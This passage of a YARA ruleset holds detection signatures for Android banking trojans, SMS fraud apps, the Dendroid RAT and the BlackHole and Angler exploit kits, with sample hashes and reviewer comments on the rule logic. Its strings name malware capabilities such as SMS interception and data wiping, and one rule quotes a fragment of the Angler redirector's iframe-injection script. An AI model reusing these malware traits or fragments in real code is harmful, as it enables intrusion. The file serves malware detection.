        $c = "_ZNSt12_Vector_baseISsSaISsEE13_M_deallocateEPSsj"
        $d = "FBTP2AHR3WKC6LEYON7D5GZXVISMJ4QU"
    condition:
        $a and $b and $c and $d
}
   		   
// Generic SMS fraud rule (variant 1): all four strings required.
rule genericSMS : smsFraud android
{
    meta:
        author = "https://twitter.com/plutec_net"
        reference = "https://koodous.com/"
        sample = "3fc533d832e22dc3bc161e5190edf242f70fbc4764267ca073de5a8e3ae23272"
        sample2 = "3d85bdd0faea9c985749c614a0676bb05f017f6bde3651f2b819c7ac40a02d5f"
    strings:
        $a = "SHA1-Digest: +RsrTx5SNjstrnt7pNaeQAzY4kc="
        $b = "SHA1-Digest: Rt2oRts0wWTjffGlETGfFix1dfE="
        $c = "http://image.baidu.com/wisebrowse/index?tag1=%E6%98%8E%E6%98%9F&tag2=%E5%A5%B3%E6%98%8E%E6%98%9F&tag3=%E5%85%A8%E9%83%A8&pn=0&rn=10&fmpage=index&pos=magic#/channel"
        $d = "pitchfork=022D4"
    condition:
        $a and $b and $c and $d
}
   		   
// https://otx.alienvault.com/pulse/5977d9a90972116505362a3b
// Tachi apps (per meta.description, not all of them malware): requires the
// "svcdownload" string plus at least four of the config XML tag names.
rule tachi : android
{
    meta:
        author = "https://twitter.com/plutec_net"
        source = "https://analyst.koodous.com/rulesets/1332"
        description = "This rule detects tachi apps (not all malware)"
        sample = "10acdf7db989c3acf36be814df4a95f00d370fe5b5fda142f9fd94acf46149ec"
    strings:
        $a = "svcdownload"
        $xml_1  = "<config>"
        $xml_2  = "<apptitle>"
        $xml_3  = "<txinicio>"
        $xml_4  = "<txiniciotitulo>"
        $xml_5  = "<txnored>"
        $xml_6  = "<txnoredtitulo>"
        $xml_7  = "<txnoredretry>"
        $xml_8  = "<txnoredsalir>"
        $xml_9  = "<laurl>"
        $xml_10 = "<txquieresalir>"
        $xml_11 = "<txquieresalirtitulo>"
        $xml_12 = "<txquieresalirsi>"
        $xml_13 = "<txquieresalirno>"
        $xml_14 = "<txfiltro>"
        $xml_15 = "<txfiltrourl>"
        $xml_16 = "<posicion>"
    condition:
        $a and 4 of ($xml_*)
}
// https://otx.alienvault.com/pulse/5977d96b481b4c7935f5f812
// SlemBunk banking trojan: all four C2 command strings and "Visa Electron" must match.
rule SlemBunk : android
{
    meta:
        description = "Rule to detect trojans imitating banks of North America, Eurpope and Asia"
        author = "@plutec_net"
        sample = "e6ef34577a75fc0dc0a1f473304de1fc3a0d7d330bf58448db5f3108ed92741b"
        source = "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"
    strings:
        $a = "#intercept_sms_start"
        $b = "#intercept_sms_stop"
        $c = "#block_numbers"
        $d = "#wipe_data"
        $e = "Visa Electron"
    condition:
        $a and $b and $c and $d and $e
}
   		   
      
// https://otx.alienvault.com/pulse/58ffc41da0117e544f052fe7
// Marcher (ruleset 890, variant 2): both opaque strings required.
rule marcher2
{
    meta:
        author = "Antonio S. <asanchez@koodous.com>"
        source = "https://analyst.koodous.com/rulesets/890"
    strings:
        $a = "HDNRQ2gOlm"
        $b = "lElvyohc9Y1X+nzVUEjW8W3SbUA"
    condition:
        $a and $b
}
   		   
// Marcher banking malware (ruleset 890, variant 1): both base64 strings required.
rule marcher1
{
    meta:
        author = "Antonio S. <asanchez@koodous.com>"
        source = "https://analyst.koodous.com/rulesets/890"
        description = "This rule detects is to detect a type of banking malware"
        sample = "33b1a9e4a1591c1a39fdd5295874e365dbde9448098254a938525385498da070"
    strings:
        $a = "cmVudCYmJg=="
        $b = "dXNzZCYmJg=="
    condition:
        $a and $b
}
   		   
// Marcher (ruleset 890, variant 3): both Portuguese-language lure strings required.
rule marcher3
{
    meta:
        author = "Antonio S. <asanchez@koodous.com>"
        source = "https://analyst.koodous.com/rulesets/890"
        sample1 = "087710b944c09c3905a5a9c94337a75ad88706587c10c632b78fad52ec8dfcbe"
        sample2 = "fa7a9145b8fc32e3ac16fa4a4cf681b2fa5405fc154327f879eaf71dd42595c2"
    strings:
        $a = "certificado # 73828394"
        $b = "A compania TMN informa que o vosso sistema Android tem vulnerabilidade"
    condition:
        $a and $b
}
// Marcher new variant (ruleset 1301): the assets/*.dat zip-entry regex and both
// card-image names must match.
// NOTE(review): in $a the "." before "datPK" is unescaped and therefore matches
// any character, not only a literal dot; kept as-is to preserve behaviour -
// confirm against the ruleset source whether "\.dat" was intended.
rule marcher_v2
{
    meta:
        description = "This rule detects a new variant of Marcher"
        sample = "27c3b0aaa2be02b4ee2bfb5b26b2b90dbefa020b9accc360232e0288ac34767f"
        author = "Antonio S. <asanchez@koodous.com>"
        source = "https://analyst.koodous.com/rulesets/1301"
    strings:
        $a = /assets\/[a-z]{1,12}.datPK/
        $b = "mastercard_img"
        $c = "visa_verifed"
    condition:
        $a and $b and $c
}
      
// https://otx.alienvault.com/pulse/5977d7e1afb3db7e24c241b0
// Dendroid RAT: all five strings must match (the last two are generic Android
// framework class paths and only narrow the rule together with the first three).
rule Dendroid : android
{
    meta:
        author = "https://twitter.com/jsmesa"
        reference = "https://koodous.com/"
        description = "Dendroid RAT"
    strings:
        $s1 = "/upload-pictures.php?"
        $s2 = "Opened Dialog:"
        $s3 = "com/connect/MyService"
        $s4 = "android/os/Binder"
        $s5 = "android/app/Service"
    condition:
        $s1 and $s2 and $s3 and $s4 and $s5
}
      
// Dendroid evidence via ServiceReceiver: both strings required.
rule Dendroid_3 : android
{
    meta:
        author = "https://twitter.com/jsmesa"
        reference = "https://koodous.com/"
        description = "Dendroid evidences via ServiceReceiver"
    strings:
        $1 = "ServiceReceiver"
        $2 = "Dendroid"
    condition:
        $1 and $2
}
      
// Dendroid evidence via the Droidian service: both strings required.
rule Dendroid_2 : android
{
    meta:
        author = "https://twitter.com/jsmesa"
        reference = "https://koodous.com/"
        description = "Dendroid evidences via Droidian service"
    strings:
        $a = "Droidian"
        $b = "DroidianService"
    condition:
        $a and $b
}
      
// https://otx.alienvault.com/pulse/564bb06667db8c7a156ba467
// Generic Blackhole landing-URL regex, no meta.
// NOTE(review): "\.*" in the pattern matches zero or more literal dots, not an
// arbitrary run of characters; if ".*" was intended the rule is far narrower
// than it looks. Kept byte-identical - confirm against the rule's source.
rule blackhole_basic : EK
{
    strings:
        $a = /\.php\?\.*\?\:[a-zA-Z0-9\:]{6,}\&\.*\?\&/
    condition:
        $a
}
// BlackHole2 kit panel directory listing (YaraGenerator output): 14 of the 15
// listing fragments must be present.
rule blackhole2_htm : EK
{
    meta:
        author = "Josh Berry"
        date = "2016-06-27"
        description = "BlackHole2 Exploit Kit Detection"
        hash0 = "92e21e491a90e24083449fd906515684"
        hash1 = "98b302a504a7ad0e3515ab6b96d623f9"
        hash2 = "a91d885ef4c4a0d16c88b956db9c6f43"
        hash3 = "d8336f7ae9b3a4db69317aea105f49be"
        hash4 = "eba5daf0442dff5b249274c99552177b"
        hash5 = "02d8e6daef5a4723621c25cfb766a23d"
        hash6 = "dadf69ce2124283a59107708ffa9c900"
        hash7 = "467199178ac940ca311896c7d116954f"
        hash8 = "17ab5b85f2e1f2b5da436555ea94f859"
        sample_filetype = "js-html"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0  = ">links/</a></td><td align"
        $string1  = ">684K</td><td>"
        $string2  = "> 36K</td><td>"
        $string3  = "move_logs.php"
        $string4  = "files/"
        $string5  = "cron_updatetor.php"
        $string6  = ">12-Sep-2012 23:45  </td><td align"
        $string7  = ">  - </td><td>"
        $string8  = "cron_check.php"
        $string9  = "-//W3C//DTD HTML 3.2 Final//EN"
        $string10 = "bhadmin.php"
        $string11 = ">21-Sep-2012 15:25  </td><td align"
        $string12 = ">data/</a></td><td align"
        $string13 = ">3.3K</td><td>"
        $string14 = "cron_update.php"
    condition:
        14 of them
}
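// BlackHole2 "/data" directory listing (YaraGenerator output). The original meta
// repeated hash0 and hash2; the duplicates are dropped, keys otherwise unchanged.
// Matching is unchanged: 14 of the 15 strings must be present.
rule blackhole2_htm12 : EK
{
    meta:
        author = "Josh Berry"
        date = "2016-06-27"
        description = "BlackHole2 Exploit Kit Detection"
        hash0 = "0d3acb5285cfe071e30be051d2aaf28a"
        hash1 = "6f27377115ba5fd59f007d2cb3f50b35"
        hash2 = "f7ffe1fd1a57d337a04d3c777cddc065"
        hash3 = "06997228f2769859ef5e4cd8a454d650"
        hash4 = "11062eea9b7f2a2675c1e60047e8735c"
        hash7 = "4ec720cfafabd1c9b1034bb82d368a30"
        hash8 = "ecd7d11dc9bb6ee842e2a2dce56edc6f"
        sample_filetype = "js-html"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0  = "  <title>Index of /data</title>"
        $string1  = "<tr><th colspan"
        $string2  = "</body></html>"
        $string3  = "> 20K</td><td>"
        $string4  = "/icons/layout.gif"
        $string5  = " <body>"
        $string6  = ">Name</a></th><th><a href"
        $string7  = ">spn.jar</a></td><td align"
        $string8  = ">spn2.jar</a></td><td align"
        $string9  = " <head>"
        $string10 = "-//W3C//DTD HTML 3.2 Final//EN"
        $string11 = "> 10K</td><td>"
        $string12 = ">7.9K</td><td>"
        $string13 = ">Size</a></th><th><a href"
        $string14 = "><hr></th></tr>"
    condition:
        14 of them
}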
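// BlackHole2 admin JS listing (YaraGenerator output). The original meta listed
// hash0 twice and hash2 three times; duplicates dropped, keys otherwise unchanged.
// Matching is unchanged: 6 of the 7 strings must be present.
rule blackhole2_htm8 : EK
{
    meta:
        author = "Josh Berry"
        date = "2016-06-27"
        description = "BlackHole2 Exploit Kit Detection"
        hash0 = "3f47452c1e40f68160beff4bb2a3e5f4"
        hash1 = "1e2ba0176787088e3580dfce0245bc16"
        hash2 = "1c78d96bb8d8f8a71294bc1e6d374b0f"
        hash3 = "f5e16a6cd2c2ac71289aaf1c087224ee"
        hash7 = "6702efdee17e0cd6c29349978961d9fa"
        hash8 = "287dca9469c8f7f0cb6e5bdd9e2055cd"
        sample_filetype = "js-html"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0 = ">Description</a></th></tr><tr><th colspan"
        $string1 = ">Name</a></th><th><a href"
        $string2 = "main.js"
        $string3 = "datepicker.js"
        $string4 = "form.js"
        $string5 = "<address>Apache/2.2.15 (CentOS) Server at online-moo-viii.net Port 80</address>"
        $string6 = "wysiwyg.js"
    condition:
        6 of them
}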
// BlackHole2 download/stats page fragments (YaraGenerator output): any 3 of the 6
// strings (payload paths with their md5 annotations) must match.
rule blackhole2_htm3 : EK
{
    meta:
        author = "Josh Berry"
        date = "2016-06-27"
        description = "BlackHole2 Exploit Kit Detection"
        hash0 = "018ef031bc68484587eafeefa66c7082"
        sample_filetype = "js-html"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0 = "/download.php"
        $string1 = "./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d"
        $string2 = "321e774d81b2c3ae"
        $string3 = "/files/new00010/554-0002.exe md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b"
        $string4 = "./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b"
        $string5 = "1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2"
    condition:
        3 of them
}
// BlackHole2 malicious PDF (YaraGenerator output): 18 of the 19 PDF object /
// xref fragments must be present.
rule blackhole2_pdf : EK PDF
{
    meta:
        author = "Josh Berry"
        date = "2016-06-27"
        description = "BlackHole2 Exploit Kit Detection"
        hash0 = "d1e2ff36a6c882b289d3b736d915a6cc"
        sample_filetype = "pdf"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0  = "/StructTreeRoot 5 0 R/Type/Catalog>>"
        $string1  = "0000036095 00000 n"
        $string2  = "http://www.xfa.org/schema/xfa-locale-set/2.1/"
        $string3  = "subform[0].ImageField1[0])/Subtype/Widget/TU(Image Field)/Parent 22 0 R/F 4/P 8 0 R/T<FEFF0049006D00"
        $string4  = "0000000026 65535 f"
        $string5  = "0000029039 00000 n"
        $string6  = "0000029693 00000 n"
        $string7  = "%PDF-1.6"
        $string8  = "27 0 obj<</Subtype/Type0/DescendantFonts 28 0 R/BaseFont/KLGNYZ"
        $string9  = "0000034423 00000 n"
        $string10 = "0000000010 65535 f"
        $string11 = ">stream"
        $string12 = "/Pages 2 0 R%/StructTreeRoot 5 0 R/Type/Catalog>>"
        $string13 = "19 0 obj<</Subtype/Type1C/Length 23094/Filter/FlateDecode>>stream"
        $string14 = "0000003653 00000 n"
        $string15 = "0000000023 65535 f"
        $string16 = "0000028250 00000 n"
        $string17 = "iceRGB>>>>/XStep 9.0/Type/Pattern/TilingType 2/YStep 9.0/BBox[0 0 9 9]>>stream"
        $string18 = "<</Root 1 0 R>>"
    condition:
        18 of them
}
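// BlackHole2 template image directory listing (YaraGenerator output).
// Fixes relative to the original: hash0/hash2 were repeated in meta, and
// "uniq1.png" was declared twice ($string0 and $string8). With 9 declared strings
// and "8 of them", the duplicate meant the rule could only fire when "uniq1.png"
// matched (counting twice) together with 6 of the remaining 7 strings. The
// condition below states exactly that, so detection behaviour is unchanged while
// the duplicate declaration is gone.
rule blackhole2_htm6 : EK
{
    meta:
        author = "Josh Berry"
        date = "2016-06-27"
        description = "BlackHole2 Exploit Kit Detection"
        hash0 = "a5f94d7bdeb88b57be67132473e48286"
        hash1 = "2e72a317d07aa1603f8d138787a2c582"
        hash2 = "9440d49e1ed0794c90547758ef6023f7"
        hash3 = "58265fc893ed5a001e3a7c925441298c"
        hash7 = "95c6462d0f21181c5003e2a74c8d3529"
        hash8 = "9236e7f96207253b4684f3497bcd2b3d"
        sample_filetype = "js-html"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0 = "uniq1.png"
        $string1 = "edit.png"
        $string2 = "left.gif"
        $string3 = "infin.png"
        $string4 = "outdent.gif"
        $string5 = "exploit.gif"
        $string6 = "sem_g.png"
        $string7 = "Index of /library/templates/img"
    condition:
        $string0 and 6 of ($string1, $string2, $string3, $string4, $string5, $string6, $string7)
}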
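// YaraGenerator string-match rule for a BlackHole2 EK admin-panel template listing.
// Duplicate meta hashes (hash0/hash2 repeated) collapsed and renumbered.
rule blackhole2_htm5 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "fccb8f71663620a5a8b53dcfb396cfb5"
      hash1 = "a09bcf1a1bdabe4e6e7e52e7f8898012"
      hash2 = "40db66bf212dd953a169752ba9349c6a"
      hash3 = "25a87e6da4baa57a9d6a2cdcb2d43249"
      hash4 = "6f4c64a1293c03c9f881a4ef4e1491b3"
      hash5 = "4bdfff8de0bb5ea2d623333a4a82c7f9"
      hash6 = "b43b6a1897c2956c2a0c9407b74c4232"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // PHP page names from an auto-index listing of /library/templates.
      $string0 = "ruleEdit.php"
      $string1 = "domains.php"
      $string2 = "menu.php"
      $string3 = "browsers_stat.php"
      $string4 = "Index of /library/templates"
      $string5 = "/icons/unknown.gif"
      $string6 = "browsers_bstat.php"
      $string7 = "oses_stat.php"
      $string8 = "exploits_bstat.php"
      $string9 = "block_config.php"
      $string10 = "threads_bstat.php"
      $string11 = "settings.php"
   condition:
      // "browsers_bstat.php" was listed twice ($string6/$string11) with 12 of 13
      // required; the duplicate is removed and the "all but one" threshold kept
      // over the 12 distinct strings. No file-type or filesize gate.
      11 of them
   }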
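// YaraGenerator string-match rule for a BlackHole2 EK "/files" directory listing.
// Duplicate meta hash (hash2 repeated) collapsed and renumbered.
rule blackhole2_htm10 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "83704d531c9826727016fec285675eb1"
      hash1 = "103ef0314607d28b3c54cd07e954cb25"
      hash2 = "16c002dc45976caae259d7cabc95b2c3"
      hash3 = "fd84d695ac3f2ebfb98d3255b3a4e1de"
      hash4 = "c7b417a4d650c72efebc2c45eefbac2a"
      hash5 = "c3c35e465e316a71abccca296ff6cd22"
      hash6 = "10ce7956266bfd98fe310d7568bfc9d0"
      hash7 = "60024caf40f4239d7e796916fb52dc8c"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // HTML fragments of an auto-index page; several ($string0, $string8,
      // $string12) are generic markup and carry little signal on their own.
      // $string11 pins a specific "Last modified" timestamp, so this rule is
      // tied to one snapshot of the listing.
      $string0 = "</body></html>"
      $string1 = "/icons/back.gif"
      $string2 = ">373K</td><td>"
      $string3 = "/icons/unknown.gif"
      $string4 = ">Last modified</a></th><th><a href"
      $string5 = "tmp.gz"
      $string6 = ">tmp.gz</a></td><td align"
      $string7 = "nbsp;</td><td align"
      $string8 = "</table>"
      $string9 = ">  - </td><td>"
      $string10 = ">filefdc7aaf4a3</a></td><td align"
      $string11 = ">19-Sep-2012 07:06  </td><td align"
      $string12 = "><img src"
      $string13 = "file3fa7bdd7dc"
      $string14 = "  <title>Index of /files</title>"
      $string15 = "0da49e042d"
   condition:
      // All but one of the 16 strings; no file-type or filesize gate.
      15 of them
   }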
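// YaraGenerator string-match rule for a BlackHole2 EK web-root directory listing.
// Duplicate meta hashes (hash0/hash2 repeated) collapsed and renumbered.
rule blackhole2_htm4 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "926429bf5fe1fbd531eb100fc6e53524"
      hash1 = "7b6cdc67077fc3ca75a54dea0833afe3"
      hash2 = "82f108d4e6f997f8fc4cc02aad02629a"
      hash3 = "bd819c3714dffb5d4988d2f19d571918"
      hash4 = "9bc9f925f60bd8a7b632ae3a6147cb9e"
      hash5 = "386cb76d46b281778c8c54ac001d72dc"
      hash6 = "0d95c666ea5d5c28fca5381bd54304b3"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // File names from the listing; "kcaptcha" and the *.dat names are the
      // most specific, the /icons/*.gif entries are generic auto-index assets.
      $string0 = "words.dat"
      $string1 = "/icons/back.gif"
      $string2 = "data.dat"
      $string3 = "files.php"
      $string4 = "js.php"
      $string5 = "template.php"
      $string6 = "kcaptcha"
      $string7 = "/icons/blank.gif"
      $string8 = "java.dat"
   condition:
      // All but one of the 9 strings; no file-type or filesize gate.
      8 of them
   }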
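// YaraGenerator string-match rule for a BlackHole2 EK Java archive.
rule blackhole2_jar : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "86946ec2d2031f2b456e804cac4ade6d"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // The "fbeatbea/*.class" entries are archive member names (the ".classPK"
      // form is a name immediately followed by the next ZIP "PK" signature) and
      // are the meaningful part. The short mixed-symbol strings look like slices
      // of compressed member data and will not survive a recompile/repack.
      $string0 = "k0/3;N"
      $string1 = "g:WlY0"
      $string2 = "(ww6Ou"
      $string3 = "SOUGX["
      $string4 = "7X2ANb"
      $string5 = "r8L<;zYH)"
      $string6 = "fbeatbea/fbeatbee.classPK"
      $string7 = "fbeatbea/fbeatbec.class"
      $string8 = "fbeatbea/fbeatbef.class"
      $string9 = "fbeatbea/fbeatbef.classPK"
      $string10 = "fbeatbea/fbeatbea.class"
      $string11 = "fbeatbea/fbeatbeb.classPK"
      $string12 = "nOJh-2"
      $string13 = "[af:Fr"
   condition:
      // All but one of the 14 strings; no ZIP-magic or filesize gate.
      13 of them
   }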
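// YaraGenerator string-match rule for the BlackHole2 EK admin-panel stylesheet.
rule blackhole2_css : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "9664a16c65782d56f02789e7d52359cd"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // CSS background-image references routed through the panel's "?a=img&img="
      // handler; the "%%" placeholder is part of the literal and is matched as-is.
      $string1 = "background:url('%%?a=img&img=countries.gif')"
      $string2 = "background:url('%%?a=img&img=exploit.gif')"
      $string3 = "background:url('%%?a=img&img=oses.gif')"
      $string4 = "background:url('%%?a=img&img=browsers.gif')"
      $string5 = "background:url('%%?a=img&img=edit.png')"
      $string6 = "background:url('%%?a=img&img=add.png')"
      $string7 = "background:url('%%?a=img&img=accept.png')"
      $string8 = "background:url('%%?a=img&img=del.png')"
      $string9 = "background:url('%%?a=img&img=stat.gif')"
   condition:
      // The original condition was "18 of them" with only 9 strings defined,
      // which can never be satisfied. Set to the "all but one" threshold the
      // other generated rules in this set use.
      8 of them
   }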
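// YaraGenerator string-match rule for a BlackHole2 EK "/dummy" directory listing.
// Duplicate meta hashes (hash0/hash2 repeated) collapsed and renumbered.
rule blackhole2_htm11 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "e89b56df597688c489f06a0a6dd9efed"
      hash1 = "06ba331ac5ae3cd1986c82cb1098029e"
      hash2 = "a899dedb50ad81d9dbba660747828c7b"
      hash3 = "7cbb58412554327fe8b643204a046e2b"
      hash4 = "530d31a0c45b79c1ee0c5c678e242c02"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // Mostly generic auto-index markup; only $string7 ("Index of /dummy")
      // names something specific to this kit's layout.
      $string0 = "></th><th><a href"
      $string1 = "/icons/back.gif"
      $string2 = ">Description</a></th></tr><tr><th colspan"
      $string3 = "nbsp;</td><td align"
      $string4 = "nbsp;</td></tr>"
      $string5 = ">  - </td><td>"
      $string6 = "-//W3C//DTD HTML 3.2 Final//EN"
      $string7 = "<h1>Index of /dummy</h1>"
      $string8 = ">Size</a></th><th><a href"
      $string9 = " </head>"
      $string10 = "/icons/blank.gif"
      $string11 = "><hr></th></tr>"
   condition:
      // All but one of the 12 strings; no file-type or filesize gate.
      11 of them
   }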
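// YaraGenerator string-match rule for a BlackHole1 EK Java archive.
// Unlike the BlackHole2 rules in this set it carries no "EK" tag, so
// tag-based rule selection will not pick it up.
rule blackhole1_jar
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "BlackHole1 Exploit Kit Detection"
      hash0 = "724acccdcf01cf2323aa095e6ce59cae"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // Manifest "Created-By" line and ZIP member names (workpack/*, xmleditor/*)
      // are the durable indicators; the short symbol strings look like slices of
      // compressed member data and are brittle.
      $string0 = "Created-By: 1.6.0_18 (Sun Microsystems Inc.)"
      $string1 = "workpack/decoder.classmQ]S"
      $string2 = "workpack/decoder.classPK"
      $string3 = "workpack/editor.classPK"
      $string4 = "xmleditor/GUI.classmO"
      $string5 = "xmleditor/GUI.classPK"
      $string6 = "xmleditor/peers.classPK"
      $string7 = "v(SiS]T"
      $string8 = ",R3TiV"
      $string9 = "META-INF/MANIFEST.MFPK"
      $string10 = "xmleditor/PK"
      $string11 = "Z[Og8o"
      $string12 = "workpack/PK"
   condition:
      // All but one of the 13 strings; no ZIP-magic or filesize gate.
      12 of them
   }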
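// YaraGenerator string-match rule for a second BlackHole2 EK Java archive.
rule blackhole2_jar2 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "add1d01ba06d08818ff6880de2ee74e8"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // Single-letter class names (a, w, hw) plus "juqirvs" suggest an
      // obfuscated build; the symbol-only strings look like compressed data.
      $string0 = "6_O6d09"
      $string1 = "juqirvs.classPK"
      $string2 = "hw.classPK"
      $string3 = "a.classPK"
      $string4 = "w.classuS]w"
      $string5 = "w.classPK"
      $string6 = "YE}0vCZ"
      $string7 = "v)Q,Ff"
      $string8 = "%8H%t("
      $string9 = "hw.class"
      $string10 = "a.classmV"
      $string11 = "2CniYFU"
      $string12 = "juqirvs.class"
   condition:
      // All but one of the 13 strings; no ZIP-magic or filesize gate.
      12 of them
   }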
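// YaraGenerator string-match rule for a third BlackHole2 EK Java archive.
rule blackhole2_jar3 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-27"
      description = "BlackHole2 Exploit Kit Detection"
      hash0 = "c7abd2142f121bd64e55f145d4b860fa"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // Member names (vcs, m, chcyih, hw) are the durable part; the rest look
      // like slices of compressed data and are brittle.
      $string0 = "69/sj]]o"
      $string1 = "GJk5Nd"
      $string2 = "vcs.classu"
      $string3 = "T<EssB"
      $string4 = "1vmQmQ"
      $string5 = "Kf1Ewr"
      $string6 = "c$WuuuKKu5"
      $string7 = "m.classPK"
      $string8 = "chcyih.classPK"
      $string9 = "hw.class"
      $string10 = "f';;;;{"
      $string11 = "vcs.classPK"
      $string12 = "Vbhf_6"
   condition:
      // All but one of the 13 strings; no ZIP-magic or filesize gate.
      12 of them
   }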
// https://otx.alienvault.com/pulse/56d5c4854637f2499b616afd
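// YaraGenerator string-match rule for an Angler EK Flash sample.
// Every string is a short run of apparently random bytes (likely compressed
// SWF content), so this rule identifies this one sample rather than the family.
rule angler_flash : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "8081397c30b53119716c374dd58fc653"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      $string0 = "(9OOSp"
      $string1 = "r$g@ 0'[A"
      $string2 = ";R-1qTP"
      $string3 = "xwBtR4"
      $string4 = "YbVjxp"
      $string5 = "ddgXkF"
      $string6 = ")n'URF"
      $string7 = "vAzq@W"
      $string8 = "rOkX$6m<"
      $string9 = "@@DB}q "
      $string10 = "TiKV'iV"
      $string11 = "538x;B"
      $string12 = "9pEM{d"
      $string13 = ".SIy/O"
      $string14 = "ER<Gu,"
   condition:
      // All but one of the 15 strings; no SWF-magic or filesize gate.
      14 of them
   }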
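// YaraGenerator string-match rule for an Angler EK Flash sample; see
// angler_flash for the caveat that these byte runs are sample-specific.
rule angler_flash5 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "9f809272e59ee9ecd71093035b31eec6"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // $string1 contains an escaped backslash: the literal is \Pb@(R.
      $string0 = "0k%2{u"
      $string1 = "\\Pb@(R"
      $string2 = "ys)dVI"
      $string3 = "tk4_y["
      $string4 = "LM2Grx"
      $string5 = "n}s5fb"
      $string6 = "jT Nx<hKO"
      $string7 = "5xL>>}"
      $string8 = "S%,1{b"
      $string9 = "C'3g7j"
      $string10 = "}gfoh]"
      $string11 = ",KFVQb"
      $string12 = "LA;{Dx"
   condition:
      // All but one of the 13 strings; no SWF-magic or filesize gate.
      12 of them
   }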
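// YaraGenerator string-match rule for an Angler EK Flash sample; the byte
// runs below are sample-specific, not family-level indicators.
rule angler_flash4 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "dbb3f5e90c05602d92e5d6e12f8c1421"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      $string0 = "_u;cwD;"
      $string1 = "lhNp74"
      $string2 = "Y0GQ%v"
      $string3 = "qjqCb,nx"
      $string4 = "vn{l{Wl"
      $string5 = "5j5jz5"
      $string6 = "a3EWwhM"
      $string7 = "hVJb/4Aut"
      $string8 = ",lm4v,"
      $string9 = ",6MekS"
      $string10 = "YM.mxzO"
      $string11 = ";6 -$E"
      $string12 = "QA%: fy"
      $string13 = "<@{qvR"
      $string14 = "b9'$'6l"
      $string15 = ",x:pQ@-"
      $string16 = "2Dyyr9"
   condition:
      // All but one of the 17 strings; no SWF-magic or filesize gate.
      16 of them
   }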
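// Angler EK redirector page: inline script that sets a one-week cookie named
// PHP_SESSION_PHP and then injects an iframe. All five fragments must be present.
rule AnglerEKredirector : EK
   {
      meta:
         description = "Angler Exploit Kit Redirector"
         ref = "http://blog.xanda.org/2015/08/28/yara-rule-for-angler-ek-redirector-js/"
         author = "adnan.shukor@gmail.com"
         date = "08-July-2015"
         impact = "5"
         version = "1"
      strings:
         // "fullword" requires the fragment to be bounded by non-alphanumerics;
         // $ekr2 deliberately omits it because the cookie value continues inline.
         $ekr1 = "<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000);" fullword
         $ekr2 = "document.cookie=\"PHP_SESSION_PHP="
         $ekr3 = "path=/; expires=\"+date.toUTCString();</script>" fullword
         $ekr4 = "<iframe src=" fullword
         $ekr5 = "</iframe></div>" fullword
      condition:
         all of them
   }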
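// YaraGenerator string-match rule for an Angler EK Java archive.
rule angler_jar : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "3de78737b728811af38ea780de5f5ed7"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // "classPK" and "META-INF/MANIFEST.MF" occur in practically every JAR and
      // add no specificity; "FXPreloader.class" and "myftysbrth" carry the
      // signal. $string5/$string6 contain escaped backslashes.
      $string0 = "myftysbrth"
      $string1 = "classPK"
      $string2 = "8aoadN"
      $string3 = "j5/_<F"
      $string4 = "FXPreloader.class"
      $string5 = "V4w\\K,"
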